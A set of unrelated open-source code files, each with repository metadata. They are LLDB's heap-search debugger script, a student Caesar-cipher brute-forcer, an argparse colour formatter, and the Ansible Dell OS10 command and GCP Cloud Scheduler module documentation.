range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (lldb_info->num_matches == 0) {
uint8_t *p = (uint8_t *)lldb_info->ptr;
uint8_t *lo = (uint8_t *)ptr_addr;
uint8_t *hi = lo + ptr_size;
if (lo <= p && p < hi) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = p - lo;
lldb_info->matches[lldb_info->num_matches].type = type;
lldb_info->num_matches = 1;
}
}
};
callback_baton_t baton = { range_callback, 0, {0}, (void *)%s };
baton.matches[0].addr = 0;
baton.matches[1].addr = 0;'''
if args:
total_matches = 0
for ptr_expr in args:
user_init_code = user_init_code_format % (ptr_expr)
expr = get_iterate_memory_expr(
options, process, user_init_code, 'baton.matches')
arg_str_description = 'malloc block that contains %s' % ptr_expr
total_matches += display_match_results(
process, result, options, arg_str_description, expr, True, expr_prefix)
return total_matches
else:
result.AppendMessage(
'error: command takes one or more pointer expressions')
return 0
def get_thread_stack_ranges_struct(process):
'''Create code that defines a structure that represents threads stack bounds
for all threads. It returns a static sized array initialized with all of
the tid, base, size structs for all the threads.'''
stack_dicts = list()
if process:
i = 0
for thread in process:
min_sp = thread.frame[0].sp
max_sp = min_sp
for frame in thread.frames:
sp = frame.sp
if sp < min_sp:
min_sp = sp
if sp > max_sp:
max_sp = sp
if min_sp < max_sp:
stack_dicts.append({'tid': thread.GetThreadID(
), 'base': min_sp, 'size': max_sp - min_sp, 'index': i})
i += 1
stack_dicts_len = len(stack_dicts)
if stack_dicts_len > 0:
result = '''
#define NUM_STACKS %u
#define STACK_RED_ZONE_SIZE %u
typedef struct thread_stack_t { uint64_t tid, base, size; } thread_stack_t;
thread_stack_t stacks[NUM_STACKS];''' % (stack_dicts_len, process.target.GetStackRedZoneSize())
for stack_dict in stack_dicts:
result += '''
stacks[%(index)u].tid = 0x%(tid)x;
stacks[%(index)u].base = 0x%(base)x;
stacks[%(index)u].size = 0x%(size)x;''' % stack_dict
return result
else:
return ''
def get_sections_ranges_struct(process):
'''Create code that defines a structure that represents all segments that
can contain data for all images in "target". It returns a static sized
array initialized with all of base, size structs for all the threads.'''
target = process.target
segment_dicts = list()
for (module_idx, module) in enumerate(target.modules):
for sect_idx in range(module.GetNumSections()):
section = module.GetSectionAtIndex(sect_idx)
if not section:
break
name = section.name
if name != '__TEXT' and name != '__LINKEDIT' and name != '__PAGEZERO':
base = section.GetLoadAddress(target)
size = section.GetByteSize()
if base != lldb.LLDB_INVALID_ADDRESS and size > 0:
segment_dicts.append({'base': base, 'size': size})
segment_dicts_len = len(segment_dicts)
if segment_dicts_len > 0:
result = '''
#define NUM_SEGMENTS %u
typedef struct segment_range_t { uint64_t base; uint32_t size; } segment_range_t;
segment_range_t segments[NUM_SEGMENTS];''' % (segment_dicts_len,)
for (idx, segment_dict) in enumerate(segment_dicts):
segment_dict['index'] = idx
result += '''
segments[%(index)u].base = 0x%(base)x;
segments[%(index)u].size = 0x%(size)x;''' % segment_dict
return result
else:
return ''
def section_ptr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
description = '''Searches section contents for pointer values in darwin user space programs.'''
parser = optparse.OptionParser(
description=description,
prog='section_ptr_refs',
usage=usage)
add_common_options(parser)
parser.add_option(
'--section',
action='append',
type='string',
dest='section_names',
help='section name to search',
default=list())
try:
(options, args) = parser.parse_args(command_args)
except:
return
options.type = 'pointer'
sections = list()
section_modules = list()
if not options.section_names:
result.AppendMessage(
'error: at least one section must be specified with the --section option')
return
target = debugger.GetSelectedTarget()
for module in target.modules:
for section_name in options.section_names:
section = module.section[section_name]
if section:
sections.append(section)
section_modules.append(module)
if sections:
dylid_load_err = load_dylib()
if dylid_load_err:
result.AppendMessage(dylid_load_err)
return
frame = target.GetProcess().GetSelectedThread().GetSelectedFrame()
for expr_str in args:
for (idx, section) in enumerate(sections):
expr = 'find_pointer_in_memory(0x%xllu, %ullu, (void *)%s)' % (
section.addr.load_addr, section.size, expr_str)
arg_str_description = 'section %s.%s containing "%s"' % (
section_modules[idx].file.fullpath, section.name, expr_str)
num_matches = display_match_results(
target.GetProcess(), result, options, arg_str_description, expr, False)
if num_matches:
if num_matches < options.max_matches:
options.max_matches = options.max_matches - num_matches
else:
options.max_matches = 0
if options.max_matches == 0:
return
else:
result.AppendMessage(
'error: no sections were found that match any of %s' %
(', '.join(
options.section_names)))
def get_objc_refs_options():
usage = "usage: %prog [options] <CLASS> [CLASS ...]"
description = '''Searches all allocations on the heap for instances of
objective C classes, or any classes that inherit from the specified classes
in darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the C strings and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='objc_refs',
usage=usage)
add_common_options(parser)
return parser
def objc_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_objc_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'isa'
if options.format is None:
options.format = "A" # 'A' is "address" format
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(
3 * 1000 * 1000) # 3 second infinite timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
num_objc_classes_value = frame.EvaluateExpression(
"(int)objc_getClassList((void *)0, (int)0)", expr_options)
if not num_objc_classes_value.error.Success():
result.AppendMessage('error: %s' %
num_objc_classes_value.error.GetCString())
return
num_objc_classes = num_objc_classes_value.GetValueAsUnsigned()
if num_objc_classes == 0:
result.AppendMessage('error: no objective C classes in program')
return
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef int (*compare_callback_t)(const void *a, const void *b);
typedef struct callback_baton_t {
range_callback_t callback;
compare_callback_t compare_callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
void *isa;
Class classes[%u];
} callback_baton_t;
compare_callback_t compare_callback = [](const void *a, const void *b) -> int {
Class a_ptr = *(Class *)a;
Class b_ptr = *(Class *)b;
if (a_ptr < b_ptr) return -1;
if (a_ptr > b_ptr) return +1;
return 0;
};
typedef Class (*class_getSuperclass_type)(void *isa);
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
class_getSuperclass_type class_getSuperclass_impl = (class_getSuperclass_type)class_getSuperclass;
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (sizeof(Class) <= ptr_size) {
Class *curr_class_ptr = (Class *)ptr_addr;
Class *matching_class_ptr = (Class *)bsearch (curr_class_ptr,
(const void *)lldb_info->classes,
sizeof(lldb_info->classes)/sizeof(Class),
sizeof(Class),
lldb_info->compare_callback);
if (matching_class_ptr) {
bool match = false;
if (lldb_info->isa) {
Class isa = *curr_class_ptr;
if (lldb_info->isa == isa)
match = true;
else { // if (lldb_info->objc.match_superclasses) {
Class super = class_getSuperclass_impl(isa);
while (super) {
if (super == lldb_info->isa) {
match = true;
break;
}
super = class_getSuperclass_impl(super);
}
}
}
else
match = true;
if (match) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = 0;
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
}
};
callback_baton_t baton = { range_callback, compare_callback, 0, {0}, (void *)0x%x, {0} };
int nc = (int)objc_getClassList(baton.classes, sizeof(baton.classes)/sizeof(Class));
(void)qsort (baton.classes, sizeof(baton.classes)/sizeof(Class), sizeof(Class), compare_callback);'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our ObjC class name arguments
for class_name in args:
addr_expr_str = "(void *)[%s class]" % class_name
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(
1 * 1000 * 1000) # 1 second timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
expr_sbvalue = frame.EvaluateExpression(
addr_expr_str, expr_options)
if expr_sbvalue.error.Success():
isa = expr_sbvalue.unsigned
if isa:
options.type = 'isa'
result.AppendMessage(
'Searching for all instances of classes or subclasses of "%s" (isa=0x%x)' %
(class_name, isa))
user_init_code = user_init_code_format % (
options.max_matches, num_objc_classes, isa)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'objective C classes with isa 0x%x' % isa
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage(
'error: Can\'t find isa for an ObjC class named "%s"' %
(class_name))
else:
result.AppendMessage(
'error: expression error for "%s": %s' %
(addr_expr_str, expr_sbvalue.error))
else:
result.AppendMessage(
'error: command takes one or more C string arguments')
if __name__ == '__main__':
lldb.debugger = lldb.SBDebugger.Create()
# Make the options so we can generate the help text for the new LLDB
# command line command prior to registering it with LLDB below. This way
# if clients in LLDB type "help malloc_info", they will see the exact same
# output as typing "malloc_info --help".
ptr_refs.__doc__ = get_ptr_refs_options().format_help()
cstr_refs.__doc__ = get_cstr_refs_options().format_help()
malloc_info.__doc__ = get_malloc_info_options().format_help()
objc_refs.__doc__ = get_objc_refs_options().format_help()
lldb.debugger.HandleCommand(
'command script add -f %s.ptr_refs ptr_refs' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.cstr_refs cstr_refs' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.malloc_info malloc_info' %
__name__)
lldb.debugger.HandleCommand(
'command script add -f %s.find_variable find_variable' %
__name__)
# lldb.debugger.HandleCommand('command script add -f %s.heap heap' % package_name)
# lldb.debugger.HandleCommand('command script add -f %s.section_ptr_refs section_ptr_refs' % package_name)
# lldb.debugger.HandleCommand('command script add -f %s.stack_ptr_refs stack_ptr_refs' % package_name)
lldb.debugger.HandleCommand(
'command script add -f %s.objc_refs objc_refs' %
__name__)
print('"malloc_info", "ptr_refs", "cstr_refs", "find_variable", and "objc_refs" commands have been installed, use the "--help" options on these commands for detailed help.')
| endlessm/chromium-browser | third_party/llvm/lldb/examples/darwin/heap_find/heap.py | Python | bsd-3-clause | 61,273 |
#!/usr/bin/env python
# *-* coding: UTF-8 *-*
"""Împăratul a primit serie de mesaje importante pe care este
important să le descifreze cât mai repede.
Din păcate mesagerul nu a apucat să îi spună împăratul care au fost
cheile alese pentru fiecare mesaj și tu ai fost ales să descifrezi
misterul.
Informații:
În criptografie, cifrul lui Caesar este o metodă simplă de a cripta
un mesaj prin înlocuirea fiecărei litere cu litera de pe poziția aflată
la un n pași de ea în alfabet (unde este n este un număr întreg cunoscut
"""
# existau 2 variante de a rezolva problema cu parantezele la print
# am preferat sa o folosesc pe asta pentru a evita si eventualele probleme
# cu care ziceai tu ca o sa ne stresezi ;)
from __future__ import print_function
LETTERS = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz"
# tot timpul se va gasi litera in string-ul "LETTERS"
# deci circularitatea e suficient
# reprezentata prin a-z de doua ori
def shift_letter(let, number):
"""Shifts a letter by number places in LETTERS"""
if let.isalpha():
# procesam doar literele
return LETTERS[ord(let) - 97 + number]
# returnam litera de peste n locuri in LETTERS
else:
return let
# daca nu e litera, returnam caracterul original
def decripteaza(mesaj, number):
"""Decrypts every line in <mesaj>"""
new_msg = ""
for char in mesaj:
new_msg += shift_letter(char, number)
if "ave" in new_msg:
print(new_msg)
def main():
"""Have a main docstring, pylint"""
try:
fisier = open("mesaje.secret", "r")
mesaje = fisier.read()
fisier.close()
except IOError:
print("Nu am putut obține mesajele.")
return
for mesaj in mesaje.splitlines():
for i in range(26):
decripteaza(mesaj, i)
if __name__ == "__main__":
main()
| iulianbute/labs | python/solutii/alex_mitan/caesar.py | Python | mit | 1,892 |
# -*- coding: utf-8 -*-
"""
@author: Fabio Erculiani <[email protected]>
@contact: [email protected]
@copyright: Fabio Erculiani
@license: GPL-2
B{Entropy Infrastructure Toolkit}.
"""
import sys
import argparse
import textwrap as _textwrap
from entropy.output import decolorize
class ColorfulFormatter(argparse.RawTextHelpFormatter):
"""
This is just a whacky HelpFormatter flavour to add some coloring.
"""
def __colors(self, tup_str, orig_str):
pre_spaces = len(tup_str) - len(tup_str.lstrip())
post_spaces = len(tup_str) - len(tup_str.rstrip())
return " "*pre_spaces + orig_str.strip() \
+ " "*post_spaces
def _format_action(self, action):
# determine the required width and the entry label
help_position = min(self._action_max_length + 2,
self._max_help_position)
help_width = self._width - help_position
action_width = help_position - self._current_indent - 2
orig_action_header = self._format_action_invocation(action)
action_header = decolorize(orig_action_header)
# ho nelp; start on same line and add a final newline
if not action.help:
tup = self._current_indent, '', action_header
action_header = '%*s%s\n' % tup
# short action name; start on the same line and pad two spaces
elif len(action_header) <= action_width:
tup = self._current_indent, '', action_width, action_header
tup_str = '%*s%-*s ' % tup
action_header = self.__colors(tup_str, orig_action_header)
indent_first = 0
# long action name; start on the next line
else:
tup = self._current_indent, '', action_header
tup_str = '%*s%-*s ' % tup
action_header = self.__colors(tup_str, orig_action_header)
indent_first = help_position
# collect the pieces of the action help
parts = [action_header]
# if there was help for the action, add lines of help text
if action.help:
orig_help_text = self._expand_help(action)
help_text = decolorize(orig_help_text)
help_lines = self._split_lines(help_text, help_width)
orig_help_lines = self._split_lines(orig_help_text, help_width)
tup_str = '%*s%s' % (indent_first, '', help_lines[0])
parts.append(self.__colors(tup_str, orig_help_lines[0]) + "\n")
for idx, line in enumerate(help_lines[1:]):
tup_str = '%*s%s' % (help_position, '', line)
parts.append(
self.__colors(tup_str, orig_help_lines[idx+1]) + "\n")
# or add a newline if the description doesn't end with one
elif not action_header.endswith('\n'):
parts.append('\n')
# if there are any sub-actions, add their help as well
for subaction in self._iter_indented_subactions(action):
parts.append(self._format_action(subaction))
# return a single string
return self._join_parts(parts)
| mudler/entropy | server/eit/colorful.py | Python | gpl-2.0 | 3,125 |
__version__ = '0.17'
| etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/PyInstaller/lib/modulegraph/__init__.py | Python | gpl-3.0 | 21 |
#!/usr/bin/python
#
# (c) 2015 Peter Sprygada, <[email protected]>
# Copyright (c) 2017 Dell Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: dellos10_command
version_added: "2.2"
author: "Senthil Kumar Ganesan (@skg-net)"
short_description: Run commands on remote devices running Dell OS10
description:
- Sends arbitrary commands to a Dell OS10 node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(dellos10_config) to configure Dell OS10 devices.
extends_documentation_fragment: dellos10
options:
commands:
description:
- List of commands to send to the remote dellos10 device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of I(retries), the task fails.
See examples.
required: false
default: null
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
vars:
cli:
host: "{{ inventory_hostname }}"
username: admin
password: admin
transport: cli
tasks:
- name: run show version on remote devices
dellos10_command:
commands: show version
provider: "{{ cli }}"
- name: run show version and check to see if output contains OS10
dellos10_command:
commands: show version
wait_for: result[0] contains OS10
provider: "{{ cli }}"
- name: run multiple commands on remote nodes
dellos10_command:
commands:
- show version
- show interface
provider: "{{ cli }}"
- name: run multiple commands and evaluate the output
dellos10_command:
commands:
- show version
- show interface
wait_for:
- result[0] contains OS10
- result[1] contains Ethernet
provider: "{{ cli }}"
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always apart from low level errors (such as action plugin)
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always apart from low level errors (such as action plugin)
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
warnings:
description: The list of warnings (if any) generated by module based on arguments
returned: always
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.dellos10.dellos10 import run_commands
from ansible.module_utils.network.dellos10.dellos10 import dellos10_argument_spec, check_args
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='dellos10_command does not support running config mode '
'commands. Please use dellos10_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
# { command: <str>, prompt: <str>, response: <str> }
commands=dict(type='list', required=True),
wait_for=dict(type='list'),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(dellos10_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not be satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result = {
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
}
module.exit_json(**result)
if __name__ == '__main__':
main()
| haad/ansible | lib/ansible/modules/network/dellos10/dellos10_command.py | Python | gpl-3.0 | 7,132 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_cloudscheduler_job
description:
- A scheduled job that can publish a pubsub message or a http request every X interval
of time, using crontab format string.
- To use Cloud Scheduler your project must contain an App Engine app that is located
in one of the supported regions. If your project does not have an App Engine app,
you must create one.
short_description: Creates a GCP Job
version_added: 2.9
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
name:
description:
- The name of the job.
required: true
type: str
description:
description:
- A human-readable description for the job. This string must not contain more
than 500 characters.
required: false
type: str
schedule:
description:
- Describes the schedule on which the job will be executed.
required: false
type: str
time_zone:
description:
- Specifies the time zone to be used in interpreting schedule.
- The value of this field must be a time zone name from the tz database.
required: false
default: Etc/UTC
type: str
retry_config:
description:
- By default, if a job does not complete successfully, meaning that an acknowledgement
is not received from the handler, then it will be retried with exponential backoff
according to the settings .
required: false
type: dict
suboptions:
retry_count:
description:
- The number of attempts that the system will make to run a job using the
exponential backoff procedure described by maxDoublings.
- Values greater than 5 and negative values are not allowed.
required: false
type: int
max_retry_duration:
description:
- The time limit for retrying a failed job, measured from time when an execution
was first attempted. If specified with retryCount, the job will be retried
until both limits are reached.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
min_backoff_duration:
description:
- The minimum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
max_backoff_duration:
description:
- The maximum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
required: false
type: str
max_doublings:
description:
- The time between retries will double maxDoublings times.
- A job's retry interval starts at minBackoffDuration, then doubles maxDoublings
times, then increases linearly, and finally retries retries at intervals
of maxBackoffDuration up to retryCount times.
required: false
type: int
pubsub_target:
description:
- Pub/Sub target If the job providers a Pub/Sub target the cron will publish a
message to the provided topic .
required: false
type: dict
suboptions:
topic_name:
description:
- The name of the Cloud Pub/Sub topic to which messages will be published
when a job is delivered. The topic name must be in the same format as required
by PubSub's PublishRequest.name, for example projects/PROJECT_ID/topics/TOPIC_ID.
required: true
type: str
data:
description:
- The message payload for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
required: false
type: str
attributes:
description:
- Attributes for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
required: false
type: dict
app_engine_http_target:
description:
- App Engine HTTP target.
- If the job providers a App Engine HTTP target the cron will send a request to
the service instance .
required: false
type: dict
suboptions:
http_method:
description:
- Which HTTP method to use for the request.
required: false
type: str
app_engine_routing:
description:
- App Engine Routing setting for the job.
required: false
type: dict
suboptions:
service:
description:
- App service.
- By default, the job is sent to the service which is the default service
when the job is attempted.
required: false
type: str
version:
description:
- App version.
- By default, the job is sent to the version which is the default version
when the job is attempted.
required: false
type: str
instance:
description:
- App instance.
- By default, the job is sent to an instance which is available when the
job is attempted.
required: false
type: str
relative_uri:
description:
- The relative URI.
required: true
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is
POST or PUT. It will result in invalid argument error to set a body on a
job with an incompatible HttpMethod.
required: false
type: str
headers:
description:
- HTTP request headers.
- This map contains the header field names and values. Headers can be set
when the job is created.
required: false
type: dict
http_target:
description:
- HTTP target.
- If the job providers a http_target the cron will send a request to the targeted
url .
required: false
type: dict
suboptions:
uri:
description:
- The full URI path that the request will be sent to.
required: true
type: str
http_method:
description:
- Which HTTP method to use for the request.
required: false
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is
POST, PUT, or PATCH. It is an error to set body on a job with an incompatible
HttpMethod.
required: false
type: str
headers:
description:
- This map contains the header field names and values. Repeated headers are
not supported, but a header value can contain commas.
required: false
type: dict
oauth_token:
description:
- Contains information needed for generating an OAuth token.
- This type of authorization should be used when sending requests to a GCP
endpoint.
required: false
type: dict
suboptions:
service_account_email:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
required: false
type: str
scope:
description:
- OAuth scope to be used for generating OAuth access token. If not specified,
"U(https://www.googleapis.com/auth/cloud-platform") will be used.
required: false
type: str
oidc_token:
description:
- Contains information needed for generating an OpenID Connect token.
- This type of authorization should be used when sending requests to third
party endpoints or Cloud Run.
required: false
type: dict
suboptions:
service_account_email:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
required: false
type: str
audience:
description:
- Audience to be used when generating OIDC token. If not specified, the
URI specified in target will be used.
required: false
type: str
region:
description:
- Region where the scheduler job resides .
required: true
type: str
extends_documentation_fragment: gcp
notes:
- 'API Reference: U(https://cloud.google.com/scheduler/docs/reference/rest/)'
- 'Official Documentation: U(https://cloud.google.com/scheduler/)'
'''
EXAMPLES = '''
- name: create a job
gcp_cloudscheduler_job:
name: job
region: us-central1
schedule: "*/4 * * * *"
description: test app engine job
time_zone: Europe/London
app_engine_http_target:
http_method: POST
app_engine_routing:
service: web
version: prod
instance: my-instance-001
relative_uri: "/ping"
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
name:
description:
- The name of the job.
returned: success
type: str
description:
description:
- A human-readable description for the job. This string must not contain more than
500 characters.
returned: success
type: str
schedule:
description:
- Describes the schedule on which the job will be executed.
returned: success
type: str
timeZone:
description:
- Specifies the time zone to be used in interpreting schedule.
- The value of this field must be a time zone name from the tz database.
returned: success
type: str
retryConfig:
description:
- By default, if a job does not complete successfully, meaning that an acknowledgement
is not received from the handler, then it will be retried with exponential backoff
according to the settings .
returned: success
type: complex
contains:
retryCount:
description:
- The number of attempts that the system will make to run a job using the exponential
backoff procedure described by maxDoublings.
- Values greater than 5 and negative values are not allowed.
returned: success
type: int
maxRetryDuration:
description:
- The time limit for retrying a failed job, measured from time when an execution
was first attempted. If specified with retryCount, the job will be retried
until both limits are reached.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
minBackoffDuration:
description:
- The minimum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
maxBackoffDuration:
description:
- The maximum amount of time to wait before retrying a job after it fails.
- A duration in seconds with up to nine fractional digits, terminated by 's'.
returned: success
type: str
maxDoublings:
description:
- The time between retries will double maxDoublings times.
- A job's retry interval starts at minBackoffDuration, then doubles maxDoublings
times, then increases linearly, and finally retries retries at intervals of
maxBackoffDuration up to retryCount times.
returned: success
type: int
pubsubTarget:
description:
- Pub/Sub target If the job providers a Pub/Sub target the cron will publish a message
to the provided topic .
returned: success
type: complex
contains:
topicName:
description:
- The name of the Cloud Pub/Sub topic to which messages will be published when
a job is delivered. The topic name must be in the same format as required
by PubSub's PublishRequest.name, for example projects/PROJECT_ID/topics/TOPIC_ID.
returned: success
type: str
data:
description:
- The message payload for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
returned: success
type: str
attributes:
description:
- Attributes for PubsubMessage.
- Pubsub message must contain either non-empty data, or at least one attribute.
returned: success
type: dict
appEngineHttpTarget:
description:
- App Engine HTTP target.
- If the job providers a App Engine HTTP target the cron will send a request to
the service instance .
returned: success
type: complex
contains:
httpMethod:
description:
- Which HTTP method to use for the request.
returned: success
type: str
appEngineRouting:
description:
- App Engine Routing setting for the job.
returned: success
type: complex
contains:
service:
description:
- App service.
- By default, the job is sent to the service which is the default service
when the job is attempted.
returned: success
type: str
version:
description:
- App version.
- By default, the job is sent to the version which is the default version
when the job is attempted.
returned: success
type: str
instance:
description:
- App instance.
- By default, the job is sent to an instance which is available when the
job is attempted.
returned: success
type: str
relativeUri:
description:
- The relative URI.
returned: success
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is POST
or PUT. It will result in invalid argument error to set a body on a job with
an incompatible HttpMethod.
returned: success
type: str
headers:
description:
- HTTP request headers.
- This map contains the header field names and values. Headers can be set when
the job is created.
returned: success
type: dict
httpTarget:
description:
- HTTP target.
- If the job providers a http_target the cron will send a request to the targeted
url .
returned: success
type: complex
contains:
uri:
description:
- The full URI path that the request will be sent to.
returned: success
type: str
httpMethod:
description:
- Which HTTP method to use for the request.
returned: success
type: str
body:
description:
- HTTP request body. A request body is allowed only if the HTTP method is POST,
PUT, or PATCH. It is an error to set body on a job with an incompatible HttpMethod.
returned: success
type: str
headers:
description:
- This map contains the header field names and values. Repeated headers are
not supported, but a header value can contain commas.
returned: success
type: dict
oauthToken:
description:
- Contains information needed for generating an OAuth token.
- This type of authorization should be used when sending requests to a GCP endpoint.
returned: success
type: complex
contains:
serviceAccountEmail:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
returned: success
type: str
scope:
description:
- OAuth scope to be used for generating OAuth access token. If not specified,
"U(https://www.googleapis.com/auth/cloud-platform") will be used.
returned: success
type: str
oidcToken:
description:
- Contains information needed for generating an OpenID Connect token.
- This type of authorization should be used when sending requests to third party
endpoints or Cloud Run.
returned: success
type: complex
contains:
serviceAccountEmail:
description:
- Service account email to be used for generating OAuth token.
- The service account must be within the same project as the job.
returned: success
type: str
audience:
description:
- Audience to be used when generating OIDC token. If not specified, the
URI specified in target will be used.
returned: success
type: str
region:
description:
- Region where the scheduler job resides .
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
